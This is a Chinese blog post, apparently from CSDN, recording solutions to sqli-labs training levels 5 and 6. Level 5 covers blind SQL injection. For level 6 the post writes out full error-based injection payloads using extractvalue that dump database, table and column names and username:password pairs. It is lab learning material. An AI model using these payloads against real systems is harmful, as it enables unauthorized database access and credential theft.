sql-labs通关记录(5-6)

最新推荐文章于 2024-07-24 23:19:51 发布
最新推荐文章于 2024-07-24 23:19:51 发布
阅读量271 收藏
点赞数 2
分类专栏: Web 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36676979/article/details/105666748
版权

less-5
?id=1
在这里插入图片描述结果不返回数据库中的数据,加反引号。
在这里插入图片描述报错,再加个单引号。
在这里插入图片描述说明存在sql盲注。(进一步验证,属于字符型注入)

结合bp爆破数据库的长度和数据库名。
在这里插入图片描述在这里插入图片描述数据库长度为8,接着爆库名。
在这里插入图片描述在这里插入图片描述在这里插入图片描述库名为secuirty.

爆表
第一张表
在这里插入图片描述在这里插入图片描述emails,将limit 0,1换成limit 1,1 爆破第二张表。
在这里插入图片描述依次得到所有的表:emails,referers,usgents,users

爆users表的字段。
在这里插入图片描述依次跑出所有字段,找到username,password字段。

爆username数据,同理依次找出响应密码。
在这里插入图片描述在这里插入图片描述密码
在这里插入图片描述在这里插入图片描述

less-6
在这里插入图片描述在这里插入图片描述less-6与less-5一样,都是盲注,不过less-6使用的是双引号,将less-5中payload中的单引号改成双引号即可。

这里我尝试一下另一种方法,报错注入

爆库

?id=1"and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

在这里插入图片描述爆表

?id=1"and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"),0x7e)) --+

在这里插入图片描述

爆字段

?id=1"and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e)) --+

在这里插入图片描述因为报错最多返回32位,所以要使用limit来输出。

?id=1"and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name="users" limit 5,1),0x7e)) --+

在这里插入图片描述找到username和password字段。

爆数据

?id=1"and extractvalue(1,concat(0x7e,substr((select group_concat(username,":",password) from users) ,0,30),0x7e)) --+

在这里插入图片描述更换这里的数字。

依次将所有数据跑出来。

qq_36676979
关注
专栏目录
SQLI-LABS 靶场通过小记(23~38)
曹振国的博客
07-14 837
23~38Less-23:1.加单引号让后面闭合2.使用逻辑运算注入Less-24:Less-25:1.查看源码2.双写搭配大小写匹配关键字绕过3.关键字等价绕过Less-25a:Less-26:1.查看源码发现过滤了,and,or,空格及注释2.通过ascii码转url编码进行绕过Less-26a:Less-27:1.大小写交错绕过2.盲注绕过Less-27a:Less-28:Less-28a:1.同28题使用盲注:2.显错注入(28题也适用):Less-29(网站由世界上最好的防火墙保护):1.查询库名
SQLI-LABS 靶场通关小记(1~22)
曹振国的博客
07-14 3774
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.写入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
sql-labs通关记录(11-17)
qq_36676979的博客
04-22 240
less-11 发现一个登录框,第一反应是弱口令,先试试。 接下来检测下sql注入。使用bp抓包,看字节数。 正常的字节数,1523 加单引号’ 单引号闭合,字节数正常,说明存在字符型注入。 先看看显示位,3报错,试试2 说明有两个显示位,使用联合注入。 1'union select 1,database()# 后面就按部就班的来。 爆表 1'union select 1,group_conca...
sql-libs通关详解
最新发布
hanjinming110的博客
07-24 1402
sql-libs靶场的打靶过程
sqli-labs靶场笔记
qq_33441500的博客
10-20 228
less-1 单引号的显错注入 关键代码段 直接输入单引号让其报错 由代码我们可以看出数据库查询语句只是对id传参进行了...
Sqli-labs 靶场通关学习记录
eyyer的博客
02-13 1355
Sqli-labs 靶场通关学习记录
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
史上最详细的sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 853
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库。
SQL-labs/less1通关教程
02-29
### SQL-labs/less1通关教程详解 #### 一、理解GET传参方式与SQL注入基础 本节介绍的是如何通过GET方式传递参数来进行SQL注入的基础操作。在Web开发中,GET请求通常用于向服务器发送数据,这些数据会被附加在URL...
sqllabs通关
m0_64674174的博客
10-24 615
主界面由于mysql_real_escape_string的过滤,将单引号,双引号等进行转义,无法进行注入,注册界面以及修改密码界面,由于注册界面以及修改密码见面的闭合方式不一样,可以达到二次注入的目的,创建。安装方法:解压到小皮面板的www的目录下,在sqllabs的sql-connections目录下的db-creds.inc文件,下图划横线位置设置自己的密码即可,从代码角度而言,可以很清楚的看出由单引号闭合,直接使用sql注入的一半流程即可,查询字段,判断回显,数据库——表——列,即可 为。
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqli-lib64关闯关笔记学习资料.zip
08-22
总结的64关笔记,有之前师傅写的,也有我写的,可以作为参考,只要是存到这里防止丢失,有喜欢的朋友可以一起下载看看,学习一下,我常用的环境是WAMP。
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 6977
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
sqli-labs靶场1-12关通关记录
SEV__en的博客
07-25 1734
攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。
SQLi-Labs靶场通关笔记(1~21关)
trdtyvu的博客
07-06 1678
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择关卡。
SQLI-labs 通关笔记靶场安装
fyrmaryt的博客
02-27 617
SQLI-labs通关笔记之安装及介绍篇。
sql-lib 1-10关
鸣蜩十四的博客
06-14 688
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 2056
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
sqli-labs靶场笔记(一)
Vi_vids的博客
12-06 203
sqli-labs靶场笔记(一) Less-01 下面展示一些 会用到的payload。 id=-1' union select 1,user(),database() --+ id=-1' or exist(select * from information_schema_columns) --+ id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='secur
sqli-labs通关1-5
09-03
sqli-labs通关5关:通关5关的方法没有在提供的引用中找到相关信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class=...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值